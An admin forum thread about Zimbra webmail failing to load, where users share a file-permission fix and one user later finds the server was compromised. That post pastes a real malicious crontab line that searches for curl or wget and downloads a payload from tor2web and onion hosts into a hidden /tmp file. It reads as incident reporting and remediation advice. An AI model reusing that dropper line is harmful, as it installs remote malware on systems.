Zimbra AJAX Webmail not loading

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
gellenb

Re: Zimbra AJAX Webmail not loading

Post by gellenb »

The solution posted by AB_Zimbra worked for me. Thanks! I just now wonder what caused this to happen for myself and others at the same time. I'll be moving to a new server this week, hopefully once that is done, and brought up to the current release, all will be good.
jaymathu

Post by jaymathu »

Having a similar problem but it only affects my email client. The client is stuck on the login screen and all services appear to be running.
File "/opt/zimbra/zimbramon/pylibs/state.py", line 741, in rewriteConfig os.unlink(to)
May 25 16:43:24 mail zmconfigd[1834]: Rewrite failed: [Errno 1] Operation not permitted: '/opt/zimbra/mailboxd/webapps/service/WEB-INF/web.xml' ([Errno 1] Operation not permitted: '/opt/zimbra/mailboxd/webapps/service/WEB-INF/web.xml')
This is the error i get on my CLI
yvespires

Post by yvespires »

AB_Zimbra wrote:We had exactly the same issue. And I saw that the files had the wrong permissions (executable instead of writeable).

Version: 8.7.11_GA_3800.NETWORK

I did the following (as root);
cd /opt/zimbra/mailboxd
find webapps -type d -exec chmod 0755 {} \;
find webapps -type f -exec chmod 0644 {} \;

Then restart Zimbra;
su - zimbra
zmcontrol restart

After that, everything working fine again and no such messages in the logs anymore.
Yes. Its working now.

Thank you for posting the solution.

Seems /opt/zimbra/libexec/zmfixperms is broken
mikeyl

Post by mikeyl »

Great!
It works for me too!
Thanks AB_Zimbra
zmfixperms has a problem.
AB_Zimbra wrote:We had exactly the same issue. And I saw that the files had the wrong permissions (executable instead of writeable).

Version: 8.7.11_GA_3800.NETWORK

I did the following (as root);
cd /opt/zimbra/mailboxd
find webapps -type d -exec chmod 0755 {} \;
find webapps -type f -exec chmod 0644 {} \;

Then restart Zimbra;
su - zimbra
zmcontrol restart

After that, everything working fine again and no such messages in the logs anymore.
mmart

Post by mmart »

Thank you , you saved my day
faruque_bd

Post by faruque_bd »

The solution posted by AB_Zimbra worked for me. Thanks a lot ! I just wonder what caused this to happen for myself and others at the same time.
It will be very much helpful for all of us if we can know the root cause of this problem.
Hellen Kabuubi

Post by Hellen Kabuubi »

We've had the same issue "AB_Zimbra"your post has rescued me.
Is there a vulnerability going around?

Just still wondering what caused this for future preparations :)
asvifloyd

Post by asvifloyd »

Hi. Same problem. The solution posted by AB_Zimbra worked for a few hours. Same problem again. Maybe a crontab task started to change file permissions in a wrong way, I don't know...
gellenb

Post by gellenb »

Well the problem is back again, lasted about 24 hours. Reran the steps from AB-Zimbra and back in service again. I guess no new server this week. I won't be upgrading to a new box until this problem is resolved. I'm starting to wonder if someone has found a security flaw in the Zimbra server. This week we received several "Zimbra" fake messages that stated we need to validate our Zimbra account and yesterday that our Zimbra mailboxes limit was exceeded.
MaySky

Post by MaySky »

Hello,

I use Zimbra 8.7.11

I faced the same issue today and AB_Zimbra's solution worked fine.
However i tried to deep more into problem and found out that it's a hack.

I checked my cron (crontab -l -u zimbra) and found out the next thing
*/4 * * * * (tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /tmp/.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /tmp/.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /tmp/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /tmp/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /tmp/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-ti

Also some unknown files was in /tmp/.cache/
on of them i saw in top and it uses cpu for 300%.

I installed the latest patch for 8.7.11 - Patch 11, deleted everything from /tmp/.cache/, cleared cron "crontab -e -u zimbra" then gg and dG) and rebooted the server right immediately after that, because some process was still in memory and cron task appeared very quickly back after deletion.

Now it's 1 hour gone already and no problems till that time. Cron is clean, /tmp/.cache folder also.